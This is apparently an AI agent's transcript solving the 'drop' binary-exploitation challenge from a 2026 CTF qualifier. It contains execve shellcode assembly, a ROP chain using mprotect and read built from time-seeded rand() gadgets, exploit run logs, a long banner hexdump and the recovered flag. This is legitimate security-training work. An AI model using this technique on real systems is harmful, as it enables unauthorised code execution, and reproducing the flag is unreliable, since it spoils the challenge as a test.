# Thread Handoff - Thread: quiet-lantern-8197 - UUID: 76f184dd-bd2c-4b5d-a06f-45b9225328c1 - CTF: midnight-sun-ctf-2026-quals - Challenge: drop - Runtime: codex - Model: gpt-5.5 - Status: completed ## Transcript - **Assistant:** I’ll inspect `/challenge` first to identify the challenge type, then I’ll exercise the remote service locally or over `nc` depending on what files are provided. I’ll send short progress notes to the webhook, but I’ll avoid posting the final flag there unless you explicitly want that. - **Assistant:** The challenge is a single executable. The webhook post failed due to sandbox DNS restrictions, so I’ll request network escalation for those status posts as needed while continuing local reversing. - **Assistant:** [*] '/challenge/drop-2fc6353a2f91a08646153b842cc92989' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled SHSTK: Enabled IBT: Enabled - **Assistant:** Initial triage points to a 64-bit PIE binary with full RELRO, canary, NX, and CET enabled. Imports include `mmap`, `mprotect`, `getrandom`, `rand`, and `read`, so I’m checking whether it builds or transforms executable memory at runtime. - **Assistant:** The pivot makes the second mapping useful even though its address is hidden: after the first `ret`, `rsp` points directly into our controlled bytes. I’m looking for a predictable `jmp rsp`/`call rsp` gadget in the 8 MB rand-filled page, then the rest can be normal shellcode. - **Assistant:** seed 1778418915 hits [('jmp rsp', '0xc0dbcfc', 36092), ('call rsp', '0xc138250', 414288), ('push rsp; ret', '0xc0df0d3', 49363), ('syscall; ret', '0xc283f07', 1773319)] - **Assistant:** [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 5 [DEBUG] Received 0x711 bytes: 00000000 20 1b 5b 33 38 3b 35 3b 32 30 35 6d 1b 5b 34 38 │ ·[3│8;5;│205m│·[48│ 00000010 3b 35 3b 32 31 32 6d e2 96 84 1b 5b 30 6d 1b 5b │;5;2│12m·│···[│0m·[│ 00000020 33 38 3b 35 3b 32 30 35 6d e2 96 88 e2 96 88 e2 │38;5│;205│m···│····│ 00000030 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 │····│····│····│····│ 00000040 88 e2 96 84 1b 5b 30 6d 20 20 1b 5b 33 38 3b 35 │····│·[0m│ ·[│38;5│ 00000050 3b 32 30 35 6d 1b 5b 34 38 3b 35 3b 32 31 32 6d │;205│m·[4│8;5;│212m│ 00000060 e2 96 84 1b 5b 30 6d 1b 5b 33 38 3b 35 3b 32 30 │····│[0m·│[38;│5;20│ 00000070 35 6d e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 │5m··│····│····│····│ 00000080 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 84 │····│····│····│····│ 00000090 1b 5b 30 6d 20 1b 5b 33 38 3b 35 3b 32 30 35 6d │·[0m│ ·[3│8;5;│205m│ 000000a0 e2 96 84 1b 5b 34 38 3b 35 3b 32 31 32 6d e2 96 │····│[48;│5;21│2m··│ 000000b0 84 1b 5b 30 6d 1b 5b 33 38 3b 35 3b 32 30 35 6d │··[0│m·[3│8;5;│205m│ 000000c0 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 │····│····│····│····│ 000000d0 96 88 e2 96 88 e2 96 88 e2 96 84 1b 5b 30 6d 20 │····│····│····│[0m │ 000000e0 1b 5b 33 38 3b 35 3b 32 30 35 6d 1b 5b 34 38 3b │·[38│;5;2│05m·│[48;│ 000000f0 35 3b 32 31 32 6d e2 96 84 1b 5b 30 6d 1b 5b 33 │5;21│2m··│··[0│m·[3│ 00000100 38 3b 35 3b 32 30 35 6d e2 96 88 e2 96 88 e2 96 │8;5;│205m│····│····│ 00000110 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 │····│····│····│····│ 00000120 e2 96 88 e2 96 84 1b 5b 30 6d 20 1b 5b 33 38 3b │····│···[│0m ·│[38;│ 00000130 35 3b 32 30 35 6d 1b 5b 34 38 3b 35 3b 32 31 32 │5;20│5m·[│48;5│;212│ 00000140 6d e2 96 84 1b 5b 30 6d 1b 5b 33 38 3b 35 3b 32 │m···│·[0m│·[38│;5;2│ 00000150 30 35 6d e2 96 88 e2 96 88 e2 96 88 1b 5b 30 6d │05m·│····│····│·[0m│ 00000160 0a 20 1b 5b 33 38 3b 35 3b 32 30 35 6d e2 96 88 │· ·[│38;5│;205│m···│ 00000170 e2 96 88 e2 96 88 e2 96 88 1b 5b 34 38 3b 35 3b │····│····│··[4│8;5;│ 00000180 33 34 6d e2 96 80 e2 96 80 e2 96 88 e2 96 88 e2 │34m·│····│····│····│ 00000190 96 88 e2 96 88 1b 5b 30 6d 1b 5b 33 38 3b 35 3b │····│··[0│m·[3│8;5;│ 000001a0 32 30 35 6d e2 96 84 1b 5b 30 6d 20 1b 5b 33 38 │205m│····│[0m │·[38│ 000001b0 3b 35 3b 32 30 35 6d e2 96 88 e2 96 88 e2 96 88 │;5;2│05m·│····│····│ 000001c0 e2 96 88 1b 5b 34 38 3b 35 3b 33 34 6d e2 96 80 │····│[48;│5;34│m···│ 000001d0 e2 96 80 e2 96 80 e2 96 88 e2 96 88 e2 96 88 e2 │····│····│····│····│ 000001e0 96 88 1b 5b 30 6d 20 1b 5b 33 38 3b 35 3b 32 30 │···[│0m ·│[38;│5;20│ 000001f0 35 6d e2 96 88 e2 96 88 e2 96 88 e2 96 88 1b 5b │5m··│····│····│···[│ 00000200 34 38 3b 35 3b 33 34 6d e2 96 80 e2 96 80 e2 96 │48;5│;34m│····│····│ 00000210 80 e2 96 88 e2 96 88 e2 96 88 e2 96 88 1b 5b 30 │····│····│····│··[0│ 00000220 6d 20 1b 5b 33 38 3b 35 3b 32 30 35 6d e2 96 88 │m ·[│38;5│;205│m···│ 00000230 e2 96 88 e2 96 88 e2 96 88 1b 5b 34 38 3b 35 3b │····│····│··[4│8;5;│ 00000240 33 34 6d e2 96 80 e2 96 80 e2 96 80 e2 96 88 e2 │34m·│····│····│····│ 00000250 96 88 e2 96 88 e2 96 88 1b 5b 30 6d 20 1b 5b 33 │····│····│·[0m│ ·[3│ 00000260 38 3b 35 3b 32 30 35 6d e2 96 88 e2 96 88 e2 96 │8;5;│205m│····│····│ 00000270 88 e2 96 88 1b 5b 30 6d 0a 20 1b 5b 33 38 3b 35 │····│·[0m│· ·[│38;5│ 00000280 3b 32 30 35 6d e2 96 88 e2 96 88 e2 96 88 e2 96 │;205│m···│····│····│ 00000290 88 20 20 1b 5b 30 6d 1b 5b 33 38 3b 35 3b 33 34 │· ·│[0m·│[38;│5;34│ 000002a0 6d e2 96 80 1b 5b 33 38 3b 35 3b 32 30 35 6d e2 │m···│·[38│;5;2│05m·│ 000002b0 96 88 e2 96 88 e2 96 88 e2 96 88 1b 5b 30 6d 20 │····│····│····│[0m │ 000002c0 1b 5b 33 38 3b 35 3b 32 30 35 6d e2 96 88 e2 96 │·[38│;5;2│05m·│····│ 000002d0 88 e2 96 88 e2 96 88 e2 96 84 e2 96 84 e2 96 84 │····│····│····│····│ 000002e0 e2 96 88 e2 96 88 e2 96 88 1b 5b 34 38 3b 35 3b │····│····│··[4│8;5;│ 000002f0 33 34 6d e2 96 80 1b 5b 30 6d 20 1b 5b 33 38 3b │34m·│···[│0m ·│[38;│ 00000300 35 3b 32 30 35 6d e2 96 88 e2 96 88 e2 96 88 e2 │5;20│5m··│····│····│ 00000310 96 88 20 20 20 e2 96 88 e2 96 88 e2 96 88 e2 96 │·· │ ···│····│····│ 00000320 88 1b 5b 30 6d 20 1b 5b 33 38 3b 35 3b 32 30 35 │··[0│m ·[│38;5│;205│ 00000330 6d e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 84 │m···│····│····│····│ 00000340 e2 96 84 e2 96 84 e2 96 88 e2 96 88 e2 96 88 e2 │····│····│····│····│ 00000350 96 88 1b 5b 30 6d 20 1b 5b 33 38 3b 35 3b 32 30 │···[│0m ·│[38;│5;20│ 00000360 35 6d e2 96 88 e2 96 88 e2 96 88 e2 96 88 1b 5b │5m··│····│····│···[│ 00000370 30 6d 0a 20 1b 5b 33 38 3b 35 3b 32 30 35 6d e2 │0m· │·[38│;5;2│05m·│ 00000380 96 88 e2 96 88 e2 96 88 e2 96 88 20 20 20 e2 96 │····│····│··· │ ··│ 00000390 88 e2 96 88 e2 96 88 e2 96 88 1b 5b 30 6d 20 1b │····│····│···[│0m ·│ 000003a0 5b 33 38 3b 35 3b 32 30 35 6d e2 96 88 e2 96 88 │[38;│5;20│5m··│····│ 000003b0 e2 96 88 e2 96 88 1b 5b 34 38 3b 35 3b 33 34 6d │····│···[│48;5│;34m│ 000003c0 e2 96 80 e2 96 80 e2 96 80 e2 96 88 e2 96 88 e2 │····│····│····│····│ 000003d0 96 88 1b 5b 30 6d 1b 5b 33 38 3b 35 3b 32 30 35 │···[│0m·[│38;5│;205│ 000003e0 6d e2 96 84 1b 5b 30 6d 20 1b 5b 33 38 3b 35 3b │m···│·[0m│ ·[3│8;5;│ 000003f0 32 30 35 6d e2 96 88 e2 96 88 e2 96 88 e2 96 88 │205m│····│····│····│ 00000400 20 20 20 e2 96 88 e2 96 88 e2 96 88 e2 96 88 1b │ ·│····│····│····│ 00000410 5b 30 6d 20 1b 5b 33 38 3b 35 3b 32 30 35 6d e2 │[0m │·[38│;5;2│05m·│ 00000420 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 │····│····│····│····│ 00000430 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 1b 5b 34 │····│····│····│··[4│ 00000440 38 3b 35 3b 33 34 6d e2 96 80 1b 5b 30 6d 20 1b │8;5;│34m·│···[│0m ·│ 00000450 5b 33 38 3b 35 3b 32 30 35 6d e2 96 88 e2 96 88 │[38;│5;20│5m··│····│ 00000460 e2 96 88 e2 96 88 1b 5b 30 6d 0a 20 1b 5b 33 38 │····│···[│0m· │·[38│ 00000470 3b 35 3b 32 30 35 6d e2 96 88 e2 96 88 e2 96 88 │;5;2│05m·│····│····│ 00000480 e2 96 88 e2 96 84 e2 96 84 e2 96 88 e2 96 88 e2 │····│····│····│····│ 00000490 96 88 e2 96 88 1b 5b 34 38 3b 35 3b 33 34 6d e2 │····│··[4│8;5;│34m·│ 000004a0 96 80 1b 5b 30 6d 20 1b 5b 33 38 3b 35 3b 32 30 │···[│0m ·│[38;│5;20│ 000004b0 35 6d e2 96 88 e2 96 88 e2 96 88 e2 96 88 20 20 │5m··│····│····│·· │ 000004c0 20 e2 96 88 e2 96 88 e2 96 88 e2 96 88 1b 5b 30 │ ···│·��··│····│··[0│ 000004d0 6d 20 1b 5b 33 38 3b 35 3b 32 30 35 6d e2 96 88 │m ·[│38;5│;205│m···│ 000004e0 e2 96 88 e2 96 88 e2 96 88 e2 96 84 e2 96 84 e2 │····│····│····│····│ 000004f0 96 84 e2 96 88 e2 96 88 e2 96 88 e2 96 88 1b 5b │····│····│····│···[│ 00000500 30 6d 20 1b 5b 33 38 3b 35 3b 32 30 35 6d e2 96 │0m ·│[38;│5;20│5m··│ 00000510 88 e2 96 88 e2 96 88 e2 96 88 1b 5b 30 6d 1b 5b │····│····│···[│0m·[│ 00000520 33 38 3b 35 3b 33 34 6d e2 96 80 e2 96 80 e2 96 │38;5│;34m│····│····│ 00000530 80 e2 96 80 e2 96 80 e2 96 80 1b 5b 30 6d 20 20 │····│····│···[│0m │ 00000540 1b 5b 33 38 3b 35 3b 32 31 32 6d 1b 5b 34 38 3b │·[38│;5;2│12m·│[48;│ 00000550 35 3b 33 34 6d e2 96 84 1b 5b 33 38 3b 35 3b 32 │5;34│m···│·[38│;5;2│ 00000560 30 35 6d e2 96 84 e2 96 84 e2 96 84 1b 5b 30 6d │05m·│····│····│·[0m│ 00000570 0a 20 1b 5b 33 38 3b 35 3b 32 30 35 6d e2 96 88 │· ·[│38;5│;205│m···│ 00000580 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 │····│····│····│····│ 00000590 96 88 e2 96 88 e2 96 88 1b 5b 34 38 3b 35 3b 33 │····│····│·[48│;5;3│ 000005a0 34 6d e2 96 80 1b 5b 30 6d 20 20 1b 5b 33 38 3b │4m··│··[0│m ·│[38;│ 000005b0 35 3b 32 30 35 6d e2 96 88 e2 96 88 e2 96 88 e2 │5;20│5m··│····│····│ 000005c0 96 88 20 20 20 e2 96 88 e2 96 88 e2 96 88 e2 96 │·· │ ···│····│····│ 000005d0 88 1b 5b 30 6d 20 1b 5b 33 38 3b 35 3b 32 30 35 │··[0│m ·[│38;5│;205│ 000005e0 6d 1b 5b 34 38 3b 35 3b 33 34 6d e2 96 80 e2 96 │m·[4│8;5;│34m·│····│ 000005f0 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 │····│····│····│····│ 00000600 e2 96 88 e2 96 88 e2 96 88 e2 96 80 1b 5b 30 6d │····│····│····│·[0m│ 00000610 20 1b 5b 33 38 3b 35 3b 32 30 35 6d e2 96 88 e2 │ ·[3│8;5;│205m│····│ 00000620 96 88 e2 96 88 e2 96 88 1b 5b 30 6d 20 20 20 20 │····│····│·[0m│ │ 00000630 20 20 20 20 1b 5b 33 38 3b 35 3b 32 30 35 6d e2 │ │·[38│;5;2│05m·│ 00000640 96 88 e2 96 88 e2 96 88 e2 96 88 1b 5b 30 6d 0a │····│····│····│[0m·│ 00000650 20 1b 5b 33 38 3b 35 3b 33 34 6d e2 96 80 e2 96 │ ·[3│8;5;│34m·│····│ 00000660 80 e2 96 80 e2 96 80 e2 96 80 e2 96 80 e2 96 80 │····│····│····│····│ 00000670 e2 96 80 e2 96 80 1b 5b 30 6d 20 20 20 1b 5b 33 │····│···[│0m │ ·[3│ 00000680 38 3b 35 3b 33 34 6d e2 96 80 e2 96 80 e2 96 80 │8;5;│34m·│····│····│ 00000690 e2 96 80 20 20 20 e2 96 80 e2 96 80 e2 96 80 e2 │··· │ ··│····│····│ 000006a0 96 80 1b 5b 30 6d 20 20 1b 5b 33 38 3b 35 3b 33 │···[│0m │·[38│;5;3│ 000006b0 34 6d e2 96 80 e2 96 80 e2 96 80 e2 96 80 e2 96 │4m··│····│····│····│ 000006c0 80 e2 96 80 e2 96 80 e2 96 80 e2 96 80 1b 5b 30 │····│····│····│··[0│ 000006d0 6d 20 20 1b 5b 33 38 3b 35 3b 33 34 6d e2 96 80 │m ·│[38;│5;34│m···│ 000006e0 e2 96 80 e2 96 80 e2 96 80 1b 5b 30 6d 20 20 20 │····│····│··[0│m │ 000006f0 20 20 20 20 20 1b 5b 33 38 3b 35 3b 33 34 6d e2 │ │ ·[3│8;5;│34m·│ 00000700 96 80 e2 96 80 e2 96 80 e2 96 80 1b 5b 30 6d 0a │····│····│····│[0m·│ 00000710 0a │·│ 00000711 [DEBUG] Received 0x14 bytes: b'mem: 0xc0d3000\n' b' : ' b'38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n\nmem: 0xc0d3000\n : ' candidates [1778418935, 1778418940, 1778418945, 1778418950] seed 1778418935 jmp 0xc0db885 seed 1778418940 jmp 0xc0d54e0 seed 1778418945 jmp 0xc0f9f21 seed 1778418950 jmp 0xc0de43d using 0xc0f9f21 [DEBUG] cpp -Wno-unused-command-line-argument -C -nostdinc -undef -P -I/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/data/includes [DEBUG] Assembling .section .shellcode,"awx" .global _start .global __start _start: __start: .intel_syntax noprefix .p2align 0 /* execve(path='/bin///sh', argv=['sh'], envp=0) */ /* push b'/bin///sh\x00' */ push 0x68 push 0x732f2f2f push 0x6e69622f mov ebx, esp /* push argument array ['sh\x00'] */ /* push 'sh\x00\x00' */ push 0x1010101 xor dword ptr [esp], 0x1016972 xor ecx, ecx push ecx /* null terminate */ push 4 pop ecx add ecx, esp push ecx /* 'sh\x00' */ mov ecx, esp xor edx, edx /* call execve() */ push 11 /* 0xb */ pop eax int 0x80 Traceback (most recent call last): File "", line 36, in File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/context/__init__.py", line 1716, in setter return function(*a, **kw) ^^^^^^^^^^^^^^^^^^ File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/asm.py", line 827, in asm tmpdir = tempfile.mkdtemp(prefix = 'pwn-asm-') ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/root/.local/share/uv/python/cpython-3.12.13-linux-x86_64-gnu/lib/python3.12/tempfile.py", line 373, in mkdtemp prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/root/.local/share/uv/python/cpython-3.12.13-linux-x86_64-gnu/lib/python3.12/tempfile.py", line 126, in _sanitize_params dir = gettempdir() ^^^^^^^^^^^^ File "/root/.local/share/uv/python/cpython-3.12.13-linux-x86_64-gnu/lib/python3.12/tempfile.py", line 315, in gettempdir return _os.fsdecode(_gettempdir()) ^^^^^^^^^^^^^ File "/root/.local/share/uv/python/cpython-3.12.13-linux-x86_64-gnu/lib/python3.12/tempfile.py", line 308, in _gettempdir tempdir = _get_default_tempdir() ^^^^^^^^^^^^^^^^^^^^^^ File "/root/.local/share/uv/python/cpython-3.12.13-linux-x86_64-gnu/lib/python3.12/tempfile.py", line 223, in _get_default_tempdir raise FileNotFoundError(_errno.ENOENT, FileNotFoundError: [Errno 2] No usable temporary directory found in ['/tmp', '/var/tmp', '/usr/tmp', '/workspace'] [*] Stopped process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' (pid 5) - **Assistant:** [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 5 attempt 0 time 1778418959 seed 1778418955 addr 0xc0f449c [x] Receiving all data [x] Receiving all data: 0B [+] Receiving all data: Done (0B) [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code -11 (SIGSEGV) (pid 5) b'' [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 6 attempt 1 time 1778418960 seed 1778418960 addr 0xc0d6ea0 [x] Receiving all data [x] Receiving all data: 0B [+] Receiving all data: Done (0B) [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code -11 (SIGSEGV) (pid 6) b'' [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 7 attempt 2 time 1778418961 seed 1778418960 addr 0xc0d6ea0 [x] Receiving all data [x] Receiving all data: 0B [+] Receiving all data: Done (0B) [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code -11 (SIGSEGV) (pid 7) b'' [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 8 attempt 3 time 1778418962 seed 1778418960 addr 0xc0d6ea0 [x] Receiving all data [x] Receiving all data: 0B [+] Receiving all data: Done (0B) [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code -11 (SIGSEGV) (pid 8) b'' [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 9 attempt 4 time 1778418963 seed 1778418960 addr 0xc0d6ea0 [x] Receiving all data [x] Receiving all data: 0B [+] Receiving all data: Done (0B) [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code -11 (SIGSEGV) (pid 9) b'' - **Assistant:** The direct `jmp rsp` test crashes because the controlled page is only RW, not executable. I’m switching to a short ROP chain from the predictable page: `mprotect` the fixed rand page to RWX, `read` shellcode into that known address, then return there. - **Assistant:** [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 5 attempt 0 seed 1778418990 None Traceback (most recent call last): File "", line 30, in TypeError: 'NoneType' object is not subscriptable [*] Stopped process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' (pid 5) - **Assistant:** 1778419010 {'pop_rax': '0xc0eb6df', 'pop_rdi': '0xc0d3ac4', 'pop_rsi': '0xc0f80ec', 'pop_rdx': '0xc0e4793', 'syscall_ret': None, 'int80_ret': '0xc3352fc'} 1778419015 {'pop_rax': '0xc0dae27', 'pop_rdi': '0xc0ef854', 'pop_rsi': '0xc0db683', 'pop_rdx': '0xc0e9577', 'syscall_ret': '0xc7c93db', 'int80_ret': None} 1778419020 {'pop_rax': '0xc0d52f5', 'pop_rdi': '0xc0f8d73', 'pop_rsi': '0xc0d9709', 'pop_rdx': '0xc0d4b1f', 'syscall_ret': '0xc5df1b6', 'int80_ret': '0xc6b6474'} 1778419025 {'pop_rax': '0xc0e155c', 'pop_rdi': '0xc0e4f8f', 'pop_rsi': '0xc0e8657', 'pop_rdx': '0xc0e0a05', 'syscall_ret': None, 'int80_ret': None} 1778419030 {'pop_rax': '0xc0f9020', 'pop_rdi': '0xc0da25c', 'pop_rsi': '0xc0e2d83', 'pop_rdx': '0xc0eee6d', 'syscall_ret': None, 'int80_ret': None} 1778419035 {'pop_rax': '0xc0d6305', 'pop_rdi': '0xc0dc61f', 'pop_rsi': '0xc0d3e27', 'pop_rdx': '0xc0de0df', 'syscall_ret': None, 'int80_ret': None} 1778419040 {'pop_rax': '0xc0d612b', 'pop_rdi': '0xc0e1c07', 'pop_rsi': '0xc0edd64', 'pop_rdx': '0xc0d86fd', 'syscall_ret': None, 'int80_ret': None} 1778419045 {'pop_rax': '0xc0d8cf7', 'pop_rdi': '0xc0e1685', 'pop_rsi': '0xc12a5f7', 'pop_rdx': '0xc0ea89d', 'syscall_ret': '0xc720d70', 'int80_ret': None} 1778419050 {'pop_rax': '0xc0e3e61', 'pop_rdi': '0xc0dcc30', 'pop_rsi': '0xc0e3530', 'pop_rdx': '0xc0fa989', 'syscall_ret': '0xc7fe4a0', 'int80_ret': None} 1778419055 {'pop_rax': '0xc0de6fc', 'pop_rdi': '0xc0ea84b', 'pop_rsi': '0xc0dcd41', 'pop_rdx': '0xc0ea4d0', 'syscall_ret': None, 'int80_ret': None} 1778419060 {'pop_rax': '0xc0d92a9', 'pop_rdi': '0xc0f7459', 'pop_rsi': '0xc0e017f', 'pop_rdx': '0xc0dd89b', 'syscall_ret': '0xc8bf36c', 'int80_ret': None} 1778419065 {'pop_rax': '0xc0e6bd8', 'pop_rdi': '0xc0dc6d3', 'pop_rsi': '0xc0d629c', 'pop_rdx': '0xc0ed83f', 'syscall_ret': None, 'int80_ret': None} 1778419070 {'pop_rax': '0xc0ecb18', 'pop_rdi': '0xc0dc5c0', 'pop_rsi': '0xc0edcb3', 'pop_rdx': '0xc0e4f73', 'syscall_ret': None, 'int80_ret': None} 1778419075 {'pop_rax': '0xc10802f', 'pop_rdi': '0xc0db1b7', 'pop_rsi': '0xc0d860f', 'pop_rdx': '0xc0f2dc7', 'syscall_ret': '0xc1f8530', 'int80_ret': None} 1778419080 {'pop_rax': '0xc0e5787', 'pop_rdi': '0xc0db07d', 'pop_rsi': '0xc0e3a53', 'pop_rdx': '0xc0eb6bb', 'syscall_ret': '0xc263c1e', 'int80_ret': None} 1778419085 {'pop_rax': '0xc0f07c7', 'pop_rdi': '0xc0d7e17', 'pop_rsi': '0xc0f46d3', 'pop_rdx': '0xc0fe2ed', 'syscall_ret': '0xc21e824', 'int80_ret': '0xc18279c'} 1778419090 {'pop_rax': '0xc0d84b3', 'pop_rdi': '0xc0ede19', 'pop_rsi': '0xc0d3265', 'pop_rdx': '0xc0d4794', 'syscall_ret': None, 'int80_ret': None} 1778419095 {'pop_rax': '0xc0d7360', 'pop_rdi': '0xc0e5047', 'pop_rsi': '0xc0fd1ab', 'pop_rdx': '0xc0d325c', 'syscall_ret': '0xc2c81be', 'int80_ret': None} 1778419100 {'pop_rax': '0xc0dd69b', 'pop_rdi': '0xc0e4413', 'pop_rsi': '0xc0eb1a9', 'pop_rdx': '0xc0de770', 'syscall_ret': None, 'int80_ret': None} 1778419105 {'pop_rax': '0xc11bb79', 'pop_rdi': '0xc0d6dc1', 'pop_rsi': '0xc0d69a3', 'pop_rdx': '0xc0d33ff', 'syscall_ret': '0xc178283', 'int80_ret': None} - **Assistant:** now 1778419034 seed 1778419030 ok False now 1778419036 seed 1778419035 ok False now 1778419037 seed 1778419035 ok False now 1778419038 seed 1778419035 ok False now 1778419039 seed 1778419035 ok False now 1778419040 seed 1778419040 ok False now 1778419042 seed 1778419040 ok False now 1778419043 seed 1778419040 ok False now 1778419044 seed 1778419040 ok False now 1778419045 seed 1778419045 ok True [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 5 len 76 {'pop_rax': 202214647, 'pop_rdi': 202249861, 'pop_rsi': 202548727, 'pop_rdx': 202287261, 'syscall_ret': 208801136} [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code -11 (SIGSEGV) (pid 5) Traceback (most recent call last): File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/tubes/process.py", line 757, in send_raw self.proc.stdin.flush() BrokenPipeError: [Errno 32] Broken pipe During handling of the above exception, another exception occurred: Traceback (most recent call last): File "", line 35, in File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/tubes/tube.py", line 887, in send self.send_raw(data) File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/tubes/process.py", line 759, in send_raw raise EOFError EOFError - **Assistant:** Traceback (most recent call last): File "", line 8, in FileNotFoundError: [Errno 2] No such file or directory: '/proc/5/mem' - **Assistant:** pid attr 5 proc pid 5 poll None proc has False False procs sample ['/proc/1', '/proc/7', '/proc/19', '/proc/309', '/proc/314', '/proc/315', '/proc/316', '/proc/318'] poll2 None - **Assistant:** now 1778419092 seed 1778419090 ok False now 1778419093 seed 1778419090 ok False now 1778419094 seed 1778419090 ok False now 1778419095 seed 1778419095 ok True [x] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' [+] Starting local process '/challenge/drop-2fc6353a2f91a08646153b842cc92989': pid 5 len 152 {'pop_rax': 202208096, 'pop_rdi': 202264647, 'pop_rsi': 202363307, 'pop_rdx': 202191452, 'syscall_ret': 204243390} [x] Receiving all data [x] Receiving all data: 0B [x] Receiving all data: 6B [x] Receiving all data: 45B [+] Receiving all data: Done (45B) [*] Process '/challenge/drop-2fc6353a2f91a08646153b842cc92989' stopped with exit code 0 (pid 5) b'PWNED\nuid=0(root) gid=0(root) groups=0(root)\n' - **Assistant:** Local exploitation now works: the ROP chain needed 64-bit packing, then it successfully got a shell. I’m applying the same method to the remote service, with retries around the 5-second seed window in case the server clock is a little offset. - **Assistant:** --- attempt seed 1778419145 --- /home/ctf/run.sh: line 2: 2690 Illegal instruction (core dumped) ./drop round 3 now 1778419143 usable seeds [1778419145] --- attempt seed 1778419145 --- /home/ctf/run.sh: line 2: 2764 Illegal instruction (core dumped) ./drop round 4 now 1778419148 usable seeds [1778419145] - **Assistant:** --- attempt seed 1778419145 --- __START__ midnight{r4nd0m_1s_4s_r4nD0m_d03s} midnight{r4nd0m_1s_4s_r4nD0m_d03s} __END__ - **Assistant:** Solved. Flag: ```text midnight{r4nd0m_1s_4s_r4nD0m_d03s} ``` The binary seeds `libc` `rand()` with `time()` rounded down to a 5-second boundary, then fills a fixed RX mapping at `0xc0d3000` with 8 MB of predictable random bytes. It later reads our input into a random RW page, pivots `rsp` there, and executes `ret`. Because the controlled page is not executable, the exploit uses predictable gadgets from the rand-filled page: 1. Find `pop rax/rdi/rsi/rdx; ret` and `syscall; ret` gadgets for the current 5-second seed. 2. ROP `mprotect(0xc0d3000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC)`. 3. ROP `read(0, 0xc0d3000, shellcode_len)`. 4. Return to `0xc0d3000`. 5. Send `/bin/sh` shellcode and run `cat flag* /flag /home/*/flag*`. The only timing issue was matching the remote’s 5-second seed window; retrying until a seed had the needed gadgets produced the shell and flag. - **System:** Thread completed